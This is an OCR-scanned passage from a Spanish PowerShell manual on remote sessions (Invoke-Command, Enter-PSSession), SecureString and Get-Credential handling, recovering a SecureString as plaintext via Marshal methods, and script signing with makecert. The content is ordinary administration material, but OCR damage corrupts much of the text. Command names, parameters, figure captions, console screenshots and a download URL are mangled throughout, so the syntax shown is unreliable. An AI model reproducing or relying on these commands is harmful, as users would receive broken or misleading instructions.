antenonncntc.  se  utiliza  el  caracter  Mas  adelante  se  vera  como  ejecutar  un  script  de  forma 
tvmota,  sin  tener  que  pegar  el  contenido  entre  las  Haves. 
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Utilidades  remotas 

Las  ejecuciones  y  sesiones  remotas  abren  un  abanico  de  posibilidades  en  la  administracion  de 
sistemas  dentro  de  un  entomo  empresarial.  En  este  apartado  se  preseman  2  utilidades  esenciales 
en  la  administracion,  la  posibilidad  de  ejecutar  scripts  en  remoto  y  la  posibilidad  de  lanzar  una 
PowerShell  en  remoto. 

Para  llevar  a  cabo  la  ejecucion  de  un  script  a  traves  de  una  sesion  se  utiliza  el  cmdlet  Invoke - 
Command  junto  al  parametro  -FilePalh.  Con  este  parametro  se  indica  al  comando  donde  debe 
buscar  el  script  que  se  lanzara  en  remoto.  El  parametro  ScriptBlock  y  FilePath  son  incompatibles, 
por  lo  que  no  se  puede  ejecutar  Invoke-Command  con  ambos  en  la  misma  sentencia  de  la  linea 
de  comandos.  La  ejecucidn  quedaria  de  la  siguiente  manera  Invoke-Command  -Session  <objeto 
session>  -FilePath  <Ruta  del  script> . 


PS  C:SUindou3\3V3tcn32> 

Inuoke-Comnand 

-Session  $scsion  -FilePath  * C:\U3ers\practicaspSunidade3 .poi' 

Nanc  Used  <GB> 

Free  <CB> 

Provider  Root 

Cur rent Location 

PSConputerNane 

ftlias 

bit-pc 

C  124,99 

49,20 

C:\ 

. . .  itSDociunents 

bit -pc 

cert 

\ 

bit-pc 

ID  38, S4 

20,0S 

D:\ 

bit-pc 

E 

E:\ 

bit-pc 

Enu 

bit-pc 

P 

F=S 

bit-pc 

Function 

bit-pc 

HKCU 

HKEY_Cl)RRENT_USER 

bit-pc 

HK},n 

o  HKEY_LOCftL_Hfl CHINE 

bit-pc 

Variable 

bit-pc 

WSflan 

bit-pc 

Z  1,42 

.58 

Z:s 

bit-pc 

Fig.  1. 12:  Ejecucion  de  un  script  remoto. 


En  la  salida  de  los  scripts  remotos  se  da  cierta  informacion  que  quiza  el  usuario  no  quiera  que  se 
muestre  como  el  equipo  sobre  el  que  se  esta  ejecutando  el  script.  Para  este  caso  se  dispone  del 
parametro  HideComputerName ,  con  el  que  la  ejecucion  no  mostrara  en  que  equipo  se  llevo  a  cabo 
el  proceso. 


El  proceso  de  lanzar  una  PowerShell  en  la  maquina  remota  puede  ayudar  bastantc  al  admin  is  trador. 
pentes/er  o  usuario  que  lo  requicra  cn  un  momento  dado.  Esto  puede  ser  necesario  cuando  un 
usuario  necesile  manejar  una  shell  interactiva  sobre  un  equipo  remoto  para  lograr  ejecutar  acciones 
concretas,  las  cuales  no  se  encuentren  automatizadas  por  alguna  razon. 


Para  abrir  una  sesion  de  PowerShell  en  una  maquina  remota  se  puede  utilizar  el  cmdlet  Enter- 
PSSession.  Con  este  cmdlet  solo  hay  que  indicar  cual  es  la  maquina  sobre  la  que  se  quiere  lograr  el 
control  de  la  siguiente  forma  Enter-PSSession  -ComputerName  <Nombre  de  la  macjnina> .  Si  se 
quiere  acceder  con  otras  credenciales  que  no  sean  las  mismas  con  las  que  el  usuario  esta  logueado 
en  la  maquina  local  hay  que  utilizar  el  parametro  Credential.  Un  posible  ejemplo  seria  el  siguiente 
Sc  red  =  Get-Credential ;  Enter-PSSession  -ComputerCame  <Nomhre  mctquina>  -Credential  $cred. 


SWindowsVs ystem32 > 


Get— Credential;  Enter-PSSe 


cndlet  Get-Credential  en  la  posicion  1  de  la  canali2aci<5n  de  conandos 
Proporcione  ua lores  para  los  paranetros  siyuiontec: 

Credential 

tbit-oct:  PS  C:\U5ers\bit\Docuinents >  hostnane 


Fig.  1. 13:  Lanzar  una  PowerShell  en  remoto. 


Capitulo  /.  Conceptos  basicos  de  PowerShell 


Fortificar  la  informacion  en  la  linea  de  comandos 

En  los  equipos  de  trabajo  se  pueden  almacenar  datos  sensibles  los  cuales  siempre  deberian  estar 
protegidos  de  forma  segura.  La  memoria  RAM  es  una  de  esas  zonas  en  las  que  por  su  volatilidad. 
en  nmchas  ocasiones.  se  piensa  que  es  menos  peligroso  que  la  informacion  no  este  tan  protegida.  De 
este  modo  se  puede  caer  en  un  error  importante,  ya  que  seguramente  la  RAM  almacena  importancia 
critica  como  contrasehas,  identidades,  trozos  de  ficheros  sensibles.  etcetera. 

Esta  afirmacion  es  una  premisa  en  el  ambito  de  la  seguridad  de  la  informacion.  PowerShell  se  basa 
en  .NET  Framework  para  la  securizacion  de  las  cadenas  de  texto. 

1  lay  que  distinguir  entre  cadena  cifrada  y  cadena  segura.  En  este  apartado  se  estudia  las  caracteristicas 
y  |a  manera  de  gestionar  las  cadenas  seguras.  Las  propiedades  dc  las  cadenas  seguras  son  las  que  se 
pueden  visualizar  a  continuacion. 


Propiedad 

Descripcion 

Acceso  controlado 

A  las  cadenas  de  texto  solo  se  le  puede  ahadir  texto  caracter  a  caracter. 

Si  se  intenta  agregar  mas  de  un  caracter,  se  producira  un  error 

Contenido  cifrado 

Es  el  framework  el  eneargado  de  cifrar  caracter  por  caracter 

No  duplicacion 

Las  cadenas  seguras  o  SecnreString  no  se  duplican  en  memoria.  Estan 
fuera  del  alcance  del  recolector  de  basura  de  PowerShelL  ya  que  este 
podria  duplicar  dicha  informacion 

Tahla  t .04’  Pmpiedades  de  las  cadenas  seguras  en  PowerShell. 


Creadon  de  una  cadena  segura 

En  algunas  ocasiones  es  necesario  proteger  la  informacion  que  es  adquirida  por  PowerShell ,  por 
ejemplo  cuando  un  script  recoge  un  valor  sensible  que  es  requerido  al  usuario.  El  cmdlet  Read-Host 
dispone  de  un  parametro  para  proteger  mediante  la  transformacion  de  la  cadena  de  entrada  en  una 
cadena  segura  la  informacion.  Ese  parametro  es  As  Secit  reString. 


PS  C:\Usei%s\bit  03/02/2012  00:23:13  >  $sec  =  Read-Host  —  fisSecureSti'ing 

WWW 

PS  C:\Users\bit  03/02/2012  00:23:34  >  $sec 
»  vs  ten. Security .SecureSt ring 
S  C:\Users\bit  03/02/2012  00:23:37  >  | 


Fig.  1. 14:  Creadon  de  win  cadena  segura  ohtenida  por  teefado. 

Al  introducir  el  texto  se  protege  con  asteriscos  el  texto  sensible.  El  objeto  no  puede  leerse  de  forma 
dirccta,  ya  que  la  cadena  se  encuentra  protegida.  Hay  otra  manera  de  crear  cadenas  seguras,  pero 
Hevaexplicitamente  la  cadena  de  texto  en  piano,  por  lo  que  no  sc  recomienda  su  uso  en  el  desarrollo 
L  scriPts-  El  comando  ConvertTo-SecureString  permite  la  creation  de  la  cadena  segura  a  raiz  de 
una  cadena  de  texto  piano. 
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Para  ejemplifkar  esto  se  muestra  la  siguiente  inslruccibn  ConvertTo-SecureString  'prueba' 
AsPlainText  -Force.  Los  parametros.  dc  tipo  switch*  AsPlainTexl  y  Force  son  imprescindibles 
para  crear  la  cadena  segura.  Los  objetos  SecnreString  disponen  de  metodos  para  tratar  a  estos.  A 
continuation  se  pueden  estudiar  distintos  metodos  interesantes: 


Metodo 

Description 

Ejemplo 

AppendChar 

Anexa  un  caracter  a  la  cadena  segura 

$sec.AppendChar(  'x ') 

Copy 

Copia  el  objeto  que  contienc  la 
cadena  segura 

$sec2  =  Ssec.CopyO 

Dispose 

Libera  todos  los  recursos  que  utiliza 
el  objeto 

Ssec.DisposeQ 

MakeReadOnly 

El  contenido  se  hace  constante.  No 
puede  ser  modificado 

$sec.  Make  Readonly  () 

Insert  At  / 

Inserta.  eliminan  o  modifican  un 

Ssec . 

Insert  A  t(<  posicion  > ,  <caracter>) 

Remove  At  /  Set At 

caracter  en  la  posicion  indicada 

Ssec.  Remove  A  t(<posicion  >) 

Tahla  lJi5:  Metodos  dc  tos  nhjcios  SecnreString. 


E.xiste  una  curiosidad  y  es  que  si  se  erean  2  cadenas  seguras  que  albergan  el  mismo  tcxlo.  un  ataeante 
malicioso  podrfa  intentar  realizar  tuerza  bmta  sobre  ellas.  En  PowerShell  el  mismo  texto  cuando 
es  pasado  a  cadena  segura  no  es  el  mismo  objeto.  por  lo  que  si  se  aplicase  el  metodo  ecjttals  sobre 
ambos  objetos  el  valor  dcvuelto  seria  false.  Microsoft  consigue  evitar  los  ataques  de  tuerza  bruta 
sobre  las  cadenas  seguras,  evitando  este  tipo  de  ataque  caracterfstico  y  consiguiendo  obtener  mayor 
seguridad  en  cl  tratamiento  de  la  informacion. 


■*9  *  prueba'  -AsPlainText  -Foi*c»? 

s\hit  03/02/2012  00:55:13  >  $secl 

c\bit  03/02/2012  *00:55:16  >  $sec2  *  ConvertTo-SecureString  'prueba1  -AsPlainText  *-Force 
s\bit  03/02/2012  00:55:28  >  $sec2 
urit u.SecureString 

s\bit  03/02/2012  00:55:31  >  $secl . Equals<$sec2> 


Fig.  1.  15:  2  Cadenas  seguras  con  el  mismo  texto  son  distmtas. 


PS  c 

\Usei*: 

PS  c 

Syste 

\Useiv 
n .Seci 

PS  C 
PS  C 

MJsers 

\Useiv 

Syste 

n  .Sect 

PS  C 
False 

\User; 

PS  C: 

\User; 

Leyendo  las  cadenas  seguras 

Para  la  lectura  de  cadenas  seguras  se  puede  util izar  un  metodo  donde  el  recolector  de  basura  dc 
PowerShell  no  puede  intervenir.  Se  copia  el  valor  de  la  cadena  segura  a  una  zona  de  memoria  donde 
el  recolector  de  basura  no  tiene  acceso.  Si  el  recolector  tuviera  acceso  en  esa  zona  de  memoria,  se 
podria  copiar  el  valor  a  otra  zona  donde  un  ataeante  pudiera  acceder.  La  tecnica  SecureStringToBSTR 
es  la  que  asignara  el  valor  de  la  cadena  segura  a  una  zona  de  memoria  donde  el  recolector  de  basura 
no  puede  acceder.  Con  esta  tecnica  se  obtiene  un  puntero  a  la  zona  de  memoria  no  gestionada  pore 
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recolector.  Despues  con  PtrToStringUni  se  duplicara  el  contenido  de  la  cadena  pero  ya  en  piano.  Hay 
que  utilizar  rapidamente  el  valor  que  se  ha  recupcrado  y  eliminar  el  puntero  a  la  zona  de  memoria 
no  uestionada  por  el  recolector,  y  la  modification  de  la  cadena  en  claro  cuando  ya  no  sc  neccsite. 


S^AUsersVbit  03/02/2012  01:26:01  >  $ccc  ■  Read-Host  -AsSecui*eString 

pc  C:\Users\bit  03/02/2012  01:26:14  >  Sptt*  =  rSysten. Runt ine . InteropServices .Marshal ] : :SecureStringToDS1 
{k:  C-\UsersNbit  03/02/2012  01:26:24  >  $claro  »  LSysten. Runtime .  InteropServices  .Marshal] :  :Pt»*ToSti*ingUni< 
PS  C:\Usci‘s\bit  03/02/2012  01:26:49  >  $claro 

KlC:\Users\bit  03/02/2012  01:26:52  >  HLiberanos  ptr 

j»s  c:\Uscrs\bit  03/02/2012  01:27:08  >  [Systcn. Runt inc  .  IntcropScruices  .Harshal]:  :ZepoFi»eeCoTasRf1enUnicode 


Fig.  1. 16:  Recuperation  de  una  cl  are  segura  a  piano. 


Las  credenciales  tratadas  por  PowerShell 

Las  credenciales  son  unas  de  las  herramientas  de  autenticacion  y  autorizacion  mas  importantes  y  mas 
sensibles.  Por  esta  razon  este  tipo  de  informacion  debe  estar  siempre  protegida  y  nunca  almacenarse 
sin  protection,  ya  sea  en  memoria  o  disco.  Es  decir.  se  debe  evitar  el  almacenamiento  en  texto 
piano  o  codificacion  facilmente  reverseable.  Anteriormcnte  se  ha  mencionado  que  con  las  cadenas 
seguras  se  tiene  al  alcance  de  la  mano  la  posibil idad  de  enmascarar  credenciales  con  el  comando 
Raul-Host.  Otro  cnidlet  que  proporciona  seguridad  en  el  momento  de  la  captura  de  credenciales  es 
(Jet-Credential. 

||  cnullel  Get-Credential  recoge  la  informacion  sobre  el  usuario,  en  lo  que  a  contrasena  y  usuario 
se  refiere,  a  traves  de  un  pequeno  cuadro  de  dialogo  que  sale  en  la  interfaz  grafica.  Una  vez  se 
inlroduccn  los  datos  de  la  credeneial  se  crea  un  nuevo  objeto  de  tipo  PSCreden/ial.  El  atributo 
usuario  es  de  tipo  String ,  mientras  que  el  atributo  de  la  contrasena  es  de  tipo  SecnreString. 


PS  C:\Users\bit  03/02/2012  04:13:36  >  $cred  =  Get-Credential 

:ndlet  Get-Credential  en  la  posicion  1  de  la  canalizacion  de  conandos 
Proporcione  valores  para  los  parametros  siguientes: 

Credential 


Fig.  /.  1 7:  Captura  de  credenciales  con  Get-Credential. 


LI  cmdlet  Get-Credential  tiene  un  uso  amplio  en  PowerShell  para  poder  realizar  tareas  bajo  otra 
Cn  »  ad.  Los  expertos  en  seguridad  recomiendan  no  utilizar  cuentas  de  administrador  en  las 
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sesiones  de  trabajo.  solameme  ejecutar  las  acciones  que  requieran  dicbos  Privi'f 
proporciona  el  cambio  de  identidad  para  la  realizacion  de  acciones  concretas.  Como  ejemplc se 
propone  un  entomo  en  el  que  el  usuario  que  se  cncuentra  irabajando  con  una  sesion,  ya  sea  local  o 
remota  de  Powe, Shell  necesita  copiar  unos  documentos  sobre  los  que  no  dispone  de  pnvilegios.  H 
usuarm  podna  ejecutar  el  comando  Get-Credential  para  recoger  las  credenc.ales  del  usuario  que  s. 
tiene  acceso  y  utilizarlas  a  traves  del  parametro  Credential  del  comando  Copy-Item  En  resumen, 
=1  usu^o ejecutar  I.  siguiente  inttucrfta  Copy-Hem  <o,-cl,i,o  orlge„>  <ard in.  dosHno 
-Credential  $ ( Get- Credential) . 


Scripts  firmados  digitalmcnte 

Cuando  se  comento  el  apartado  de  las  politicas  de  ejecucion  se  mostraban  directivas  con  las  que  se 
puede  evitar  el  uso  de  scripts  y  los  distintos  ambitos  de  ejecucion.  Uno  de  los  casos  recomendables  es 
firmar  digitalmente  los  scripts  corporativos  con  el  fin  de  tener  un  contro  total  sobre  las  ejecuctones 
TXl  permitiendo  solo  los  que  estan  firmados.  En  otras  palabras.  de  esta  orma  se  sabe  qu.en 
es  el  desarrollador  del  script.  Existen  2  politicas  que  pueden  trabajar  con  la  firma  de  scripts: 
remotes igned  y  allsigned. 

La  firma  digital  puede  demostrar  la  autenticidad  e  integridad  de  un  mensaje  o  documento  digital. 
Entonces.  ef  usuario  que  cjecute  cl  script  firmado  tendra  la  certeza  de  qu.en  lo  creo  y  de  que  este  no 
ha  sido  modificado  en  la  transmision  u  obtencton  del  script. 

•Que  es  un  certificado  digital?  <,Para  que  se  necesita  en  el  firmado  de  scripts'!  Un  certificado  digital 
es  un  documento  con  el  eual  un  tercero.  una  C  A  o  autoridad  certificadora.  garant.za  la  idenlidad  de  un 
sujeto  que  puede  ser  el  firmante  de  un  script  entrc  otras  cosas.  y  una  clave  publica.  La  clave  pu blica  i 
que  va  asociada  al  certificado  sirve  para  verificar  que  la  firma  del  script  es  correcta  y  patentee  . 
ll,  clave  privada  con  la  que  fue  firmado.  Gracias  a  la  confianza  que  se  da  a  la  CA  se  puede  deductr  I 
que  la  clave  publica  asociada  en  cl  certificado  pertenece  a  quien  se  indtca  en  este  y  no  a  otro  suje  .  I 

Se  propone  el  siguiente  escenario.  la  empresa  A  dispone  de  un  certificado  emitido  por  una  CA  o  I 
fnclusoV-  autofirmarlo  y  colocarsc  en  posicion  de  CA.  aunquc  esto  no  es  ,o  ntas  recome  dada 
Una  vez  que  se  dispone  de  este  rol,  se  puede  emitir  ccrtificados  que  se  utthzan  para  la  firma  d e  scrip  I 
en  la  linea  de  comandos  de  PowerShelL  Estos  cerlificados  llevan  asoctados  una  clave  privada  I  I 
cual  se  utiliza  para  realizar  la  firma  del  script.  Una  vez  que  en  cl  entomo  empresanal  se  env  en  lo  I 
scripts  a  otras  maquinas,  estas  deben  disponer  del  certificado  em.l.do  por  la  CA,  por  lo  que  se  hab  I 
imporlado  o  distribuido  esos  cerlificados. 

Los  requisites  „  I 

El  mayor  de  los  requisites  para  llevar  a  cabo  la  operativa  es  disponer  de  Microsoft  IVmdom rJ  I 
Este  SDK  dispone  de  una  gran  cantidad  de  herramientas.  pero  la  que  mteiesa  en  esie ^  .  .elM 

creacion  de  ccrtificados  cs  makecert.  Se  debe  tener  en  cuenta  que  para  poder  rabaja  conmate  I 
hay  que  ejecutar  una  and  a  una  PowerSliell  como  adnunistrador.  Una  vez  tnstalado,  el  usua  P  J 
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ejecutar  la  siguiente  secuencia  Inicio  ->  Todos  los  programas  ->  Microsoft  Windows  SDK  v  7.0  - 
CMD  Shell.  Sobre  CMD  Shell,  boton  derecho  ejecutar  como  administrador. 

Para  obtener  Microsoft  Windows  SDK  se  puede  descargar  desde  la  siguiente  direction  web  http:// 
wwwJfd croso ft,  com/ download/ en/det  a  i  Is.  aspx  ?  displaying  -en  &  id =3  J  38 


Fig.  I.  IS:  Microsoft  Windows  SDK  v7.0. 


Ccrtificados 

Una  vc/.  el  usuario  tiene  Microsoft  Windows  SDK  instalado  en  cl  equipo  se  puede  erear  el  primer 
certificado  digital.  Se  convierte  el  equipo  donde  se  emite  en  CA.  Para  ello  se  ejecuta  sobre  la  and  de 
Microsoft  Windows  SDK  la  instruction  que  puede  visualizarse  en  la  imagen. 


31  Administrador  Microsoft  Windows  Server  2008  DEBUG  Build  Environment  •  makecert  -a  shal  -n  ... 


Setting  SDK  enuii'onnent  relative  to  C:\P»'ogi*an  FilesNMicrosof t  SDKs\Windows\u?.0| 
Targeting  Windows  Server  2008  x86  DEBUG 

C:\Uindows\systen32  >nakecert 

E»»ror:  Please  either  specify  the  outputCertif icateFile  or  -ss  option 
Usage:  HakeCert  C  has ic I  extended  options!  [outputCertif icateFile  1 
Ik^sic  Options 

Subject's  key  container  nane;  To  he  created  if  not  present 
hark  generated  private  key  as  exportable 
Subject's  certificate  store  name  that  stores  the  output 
cert  if icate 

Subject's  certificate  store  location. 

<CurrentUser iLocalhachine > .  Default  to  ' CurrentUser' 
Serial  Number  from  1  to  2^31-1.  Default  to  be  unique 
The  signing  authority  of  the  certificate 
<individual ! commercial 

Certificate  subject  X500  name  (eg:  CN=Fred  Dews> 

Return  a  list  of  basic  options 
Return  a  list  of  extended  options 

G.  >Wind°vs\system32>makecert  -a  shal  -n  ''CN=root  Powershell"  -*•  -sv  root.pvk  rool 
cer  -ss  Root  -sr  Localhachine  -eku  1 .3 .6 .1 .5 .5 .7.3 .3 


-ok 

pc 

“8S 


Dpi 

<keyName> 

<store> 


“8r  <location> 


-# 

$ 

-n 

-? 

**? 


<number> 

<authority> 

<X509name> 


Fiy,.  I.  J9:  Creacion  de  la  emit  lad  certificadora  de  confianza. 
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Una  vez  creado  estc  certificado  el  equipo  se  ha  convertido  en  una  C A,  se  puede  visualizar  en  el 
almacen  do  certificados.  con  MMC.  en  la  earpeta  Entidcides  de  certificacwn  raiz  de  conftanza  como 
se  ha  creado.  A  continuacion  ya  se  puede  emitir  certificados  para  la  firma  de  codigo.  Para  lograr  este 
objetivo  se  ejecuta  la  instniccion  dc  la  imagen. 


Fig.  1.20:  Em  is  ion  tie!  certificado  con  proposito  dc  firma  de  codigo. 


A  continuacion  se  delalla  los  significados  de  los  parametros  que  se  ban  ulilizado  para  la  creacion  de 
los  certificados. 


Parametro 

Descripcion 

-a 

Indica  el  algoritmo  de  la  firma  ( mcfS/shal ) 

- n 

Indica  el  nombre  del  certificado 

-/* 

Indica  que  el  certificado  sera  autofirmado 

-sv 

Indica  cual  es  la  clave  privada  asociada  a  un  certificado 

-ss 

Indica  cl  nombre  del  almacen  ( MY=personul/Root-CA ) 

-sr 

Indica  en  que  zona  del  registro  se  registra  el  almacen  del  certificado 

-eku 

Inserta  identificadores.  En  este  caso  se  esta  indicando  el  proposito  del 
certificado  con  estc  codigo 

-iv 

Indica  el  archivo  de  la  clave  privada 

-pe 

Incluye  la  clave  privada  en  el  certificado 

ic 

Indica  el  archivo  del  certificado  

Tahla  1.06:  Parametros  del  comando  nuikecert. 
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Por  ultimo  recalcar  que  el  certificado  emitido  por  la  CA.  en  este  caso  la  maquina  propia  del  usuario. 
hay  que  distribuirlo  a  las  maquinas  que  ejecutar  los  scripts  firmados.  De  este  modo  ya  se  dispone  de 
la  base  y  los  certificados  necesarios  para  la  firma  y  verificacion  de  scripts. 


Firma  tu  script 


Para  firmar  el  script  simplemente  hay  que  obtener  el  certificado  con  proposito  de  firma  dc  codigo  y 
almacenarlo  en  una  variable.  Una  vez  realizada  csta  action,  con  el  cmdlet Set-A u t hen ticodeSigna tore, 
se  aplicara  la  firma  al  script. 


Mol*  bit-PCspablo  bienuenido  a  PowerShell 

PS  C:^Users\bit  03/02/2012  13:45:05  >  $cert  ■  Is  -Path  cert :\CurrentUscr\My  -CodeS igningCert 
PS  C:\Users\bit  03/02/2012  13:45:36  >  Set-fluthent icodeS ignature  .\Sprocesos.ps!  -Certificate  $cert 


Directorio:  C:\Users\bit 


Fig .  L2 1:  Firma  del  script. 
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Capitulo  II 

Scripting  en  PowerShell 


l.Interactuando  con  la  shell 

Fn  este  apartado  se  estudia  conceptos  basicos  de  la  interaccion  con  PowerShell.  Adcmas,  se  puede 
conocer  como  personalizar  el  entorno  para  una  mejor  experiencia  de  usuario  en  el  uso  diario  de  la 
linca  de  comandos. 

Una  de  las  primeras  premisas  de  la  interaccion  con  la  linea  de  comandos  de  PowerShell  es  que 
su  conjunto  de  comandos  es  ampliable.  Esto  no  ocurre  con  la  cmd  clasica,  en  la  que  para  ampliar 
el  conjunto  de  comandos  habfa  que  desarrollar  un  programa  aparte  que  seria  ejecutado  desde  la 
terminal.  Los  comandos  binarios  nativos  de  PowerShell  denominados  andlets  pueden  ser  ampliados 
agregandose  como  complementos.  Los  complementos  en  PowerShell  se  compilan,  como  ocun*e 
con  las  herramientas  binarias  de  otras  interfaces  o  terminates.  De  este  modo  se  podrian  agregar 
oiros  pmviders.  Las  funciones  declaradas  son  olros  comandos  que  pueden  aiiadirse  para  ampliar  el 
conjunto  de  comandos  de  PowerShell ,  sin  necesidad  de  compilar  nada. 

La  linea  de  comandos  controla  la  entrada  y  la  prescntacidn  en  consola  de  los  resultados.  Cuando  el 
usuario  escribe  un  comando,  este  se  procesa  desde  PowerShell .  La  consola  aplica  un  formato  por 
dclecto.  el  cual  es  personalizable.  a  los  resultados  que  se  mostraran  por  pantalla.  Esia  funcionalidad 
interna  de  PowerShell  simplifica  mucho  el  trabajo  de  los  andlets .  ya  que  no  se  tienen  que  preocupar 
por  el  formato  de  salida. 

PowerShell  utiliza  sintaxis  del  lenguaje  Of  y  esto  es  algo  importante  a  la  hora  de  desarrollar  scripts. 
I  as  palabras  clave  y  funciones  de  sintaxis  son  practicamente  identicas  a  las  que  los  desarrolladores 
pueden  utilizar  en  C#.  Esto  es  debido  a  la  base  de  PowerShell  que  es  .NET  Framework. 

May  un  comando  especial  que  permitira  al  usuario  obtener  mueha  informacion  sobre  que  comandos 
>'  de  que  tipo  son  los  que  pueden  ser  ejecutados  en  la  linea  de  comandos.  El  cmdlet  Get-Command 
proporciona  3  columnas  con  informacion  sobre  lo  que  el  usuario  puede  ejecutar. 

I  n  la  primera  columna  denominada  CommandType  se  indica  el  tipo  del  comando,  por  cjcmplo  un 
mullet .  un  alias  o  una  funcion.  En  la  segunda  columna  se  indica  el  nombre  para  poder  invocarlo.  En 
tercera  columna  se  muestra  la  definicion  del  comando.  es  decir.  la  descripcion  de  como  lanzarlo. 
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PS  C:\Users\pablo >  Get-Connand 
ConpiandType  Nane 


Definition 


X 


H: 

ac 

Add-Computer 
Add-Content 
ft  dd-H  is  t  o  ry_ 


Fo  rEac  h-Ob  j  e  c  t 
Where-Object 
Set-Location  ft: 
ftdd-Content 

Add-Conputer  [ -Do  wain  Nane  ] 
Add-Content  [-Path]  <String 
Add-History  C [-InputObject 3 


Fig.  2.01:  Lis  facto  etc  information  de  Get -Command. 


Personalizacion  del  entorno 

Cuando  un  usuario  trabaja  diariamente  con  la  Unea  dc  comandos  dc  PowerShell  cs  de  vital 
importancia  tener  un  entorno  con  el  que  el  usuario  se  encuentre  comodo  trabajando.  Disponer  de 
los  alias  ya  cargados,  los  cniclleis  importados  o  las  funciones  personalizadas  declaradas  en  un  perfil 
es  algo  que  puede  ayudar  a  mejorar  la  cxperiencia  de  trabajo  con  PowerShell.  En  este  apariado  se 
trabajara  la  modificacion  del  entorno  de  la  linea  de  comandos  de  PowerShell  y  como  hacer  que  estos 
cambios  o  personal izaciones  scan  persistentes. 


Modificacion  del  entorno 

La  modificacion  basica  del  entorno  esta  determinada  por  opciones  de  configuration,  ya  sea  visual 
como  de  gestion.  Para  podcr  modificar  estas  opciones  se  puede  hacer  clie  en  la  esquina  superior 
izquierda  de  la  consola.  donde  se  puede  ver  el  icono  de  PowerShell ,  y  apareccra  un  menu  contextual 
donde  se  debe  elegir  la  opcion  'Pmpiedcides '. 


Fig.  2.02:  Propiedades  para  la  personalization  del  entorno  de  PowerShell. 
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En  la  pestana  opciones  se  puede  elegir  el  tamafio  del  cursor,  pequeno,  mediano  y  grande,  el  historial 
de  comandos,  definiendo  su  tamano  de  bitter,  por  dcfecto  en  50  y  opciones  de  edicion,  para  distintas 
modal idades.  En  la  pestana  fuente  se  puede  personalizar  la  fuente  para  la  linea  de  comandos  y  el 
tamano  de  esta.  En  la  pestana  de  diseno  se  puede  personalizar  el  tamarto  del  bufer  de  pantalla,  es 
decir.  el  numero  de  lineas  que  se  almacenaran  a  lo  alto  de  la  pantalla.  con  cl  scroll ,  y  el  numero  de 
caracteres  que  se  mostraran  en  cada  linea,  a  lo  ancho  de  la  pantalla. 


Por  otro  lado.  tambien  es  personal izable  el  tamano  de  la  ventana,  anchura  por  altura.  La  posicion  de 
la  ventana  tambien  se  puede  elegir  indicando.  aunque  por  defecto  es  el  sistema  operativo  quien  la 
ubica.  En  la  pestana  de  color  se  puede  personalizar  el  color  del  texto  en  pantalla,  el  color  del  fondo 
de  pantalla,  el  texto  de  las  ventanas  emergentes  y  el  fondo  de  dichas  ventanas. 


Opciones  |  Fuente^  j  Diseno  Colores 


Texto  de  la  pantalla 
o  Fondo  de  ia  partajia] 

Texto  de  ventanas  emergentes 
Fondo  de  ventanas  emergences 


Valones  de  colores  seleccionados 
Rojo:  0  l 

Verde:  0  C 

Azuf  D  C 


Colores  de  pantalla  seleccionados 


C:\UIND0US>  dir 
SYSTEM  <DIR> 

SYSTEM32  <DIR> 


10-01-99 

10-01-99 


Colores  seleccionados  para  ventanas  emergentes 


C:\WINDOUS>  dir 

SVSTEM  <DIR>  10-01-99 

SVSTEM32  <DIR>  10-01-99 


5:01 

5:01 


OTTnTiMTT 


ocaoc  -t  n -n-t  —  oo 


Aceptar 


Cancelar 


Fig.  2.03:  Personalizat  ion  de  colores  en  Pou  ershelt. 

Para  que  los  cambios  realizados  en  el  entorno  sean  permanentes  se  debe  abrir  la  consola  dc 
PowerShell  como  adm ini stradcr  de  la  maquina.  Esto  es  algo  que  se  debe  tener  en  cuenta,  ya  que  si 
no.  cada  vcz  que  el  usuario  ejecute  la  consola  no  se  almacenaran  los  cambios. 
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Perfiles 

<-,Que  es  un  perfil  en  PowerShelP.  El  perfil  son  varios  archivos  que  indican  la  configuracion  y 
personalizacion  con  la  que  la  linea  de  comandos  debe  arrancar.  En  PmverShell  sc  puede  diferenciar 
entre  la  shell  de  sistema  y  otras  shell  cargadas  con  modulos  de  otros  productos.  En  un  sistema 
Windows  7  sc  tiene  por  defecto  una  PowerShell  por  defecto.  y  para  gestionar  Microsoft  Exchange  se 
tiene  otra  shell  personalizada  para  el  tratamiento  de  dicho  producto.  Existen  4  perfiles,  jerarquizados 
por  2  tipos,  en  PowerShell  especificados  en  la  siguiente  tabla. 


Tipo 

Ruta 

Descripcion 

Usuario 

$env: userpmfile\Mis  documentos\ 
Windows  PowerShell\profile.ps  1 

Es  un  perfil  para  todos  los  escenarios  donde 
se  ejecuta  PowerShell.  ya  sea  shell  de 
sistema  o  shell  de  otros  productos 

Usuario 

Sen  v:  userprofile  \Mis 
Docttmentos  \  Windows 
PowerShelP  Microso  ft. 
PowerShell profile.ps  l 

Es  un  perfil  para  solo  el  entomo 
PowerShell  instalado  por  defecto,  la  shell 
del  sistema 

Maquina 

Senv:wim/ir\sysiem3  2' Windows 

PowerShell\vl .  O\profile.ps  1 

Perfil  para  todos  los  escenarios,  y  para 
todos  los  usuarios  de  la  maquina 

Maquina 

Senv:windir'system32\  Windows 
Po werShelh vl.O \  Microsoft. 
PowerShell _profile.ps  1 

Perfil  para  el  entomo  PowerShell  instalado 

por  defecto.  que  sc  aplica  a  todos  los 
usuarios 

Tahla  2.0 1:  Tipos  de  perfiles  i 

’  rutas  en  Powers  hell. 

En  arquitecturas  de  64  bit  la  mta  de  los  perfiles  de  maquina  es  la  misma,  salvo  que  en  vez  de  ser  la 
carpeta  System32  es  la  denominada  Syswow64.  El  flujo  de  ejccucion  de  los  perfiles  al  arrancar  una 
linea  de  comandos  de  PowerShell  I  leva  un  orden.  el  cual  se  puede  visual  izar  a  continuacion. 


1.  $env:windir\system32\ Windows  PowerShelhwl.O\profile.ps / 

2.  Senv.windir  sys/em32  •  Windows  PowerShell''  vl,  0\  Microsoft.  PowerShellprofHe.ps  I 

3.  Sen  \  v  user  profile  \  Mis  documenlos\  Windows  PowerShell\profik.ps  I 

4.  Se)7v: us er profile \ MisDocunientos \  IVindowsPowerShe/l'  Microsoft.PowerShell_profile.ps  l 

Si  en  el  archivo  pfvfite.ps  1  de  maquina  existe  la  instruction  Set -Alias  -Name  procesos  Value  (Jet- 
Process  y  existe  en  el  archivo  profilers  l  de  usuario  la  instruction  Set-Alias  -Name procesos  Value 
- Get-Service ,  prevalece  la  ultima  cargada  por  PowerShell. 

Los  perfiles  no  vienen  creados  por  defccto.  por  lo  que  el  usuario  debera  crearlos  a  traves  de 
PowerShell  o  creando  a  mano  un  archivo  de  tipo  .psl.  Se  puede  utilizar  la  variable  de  entorno 
SPROFILE  para  indicar  cual  es  la  ruta  de  creation  del  perfil  de  tipo  usuario.  Para  crear  perfiles  de 
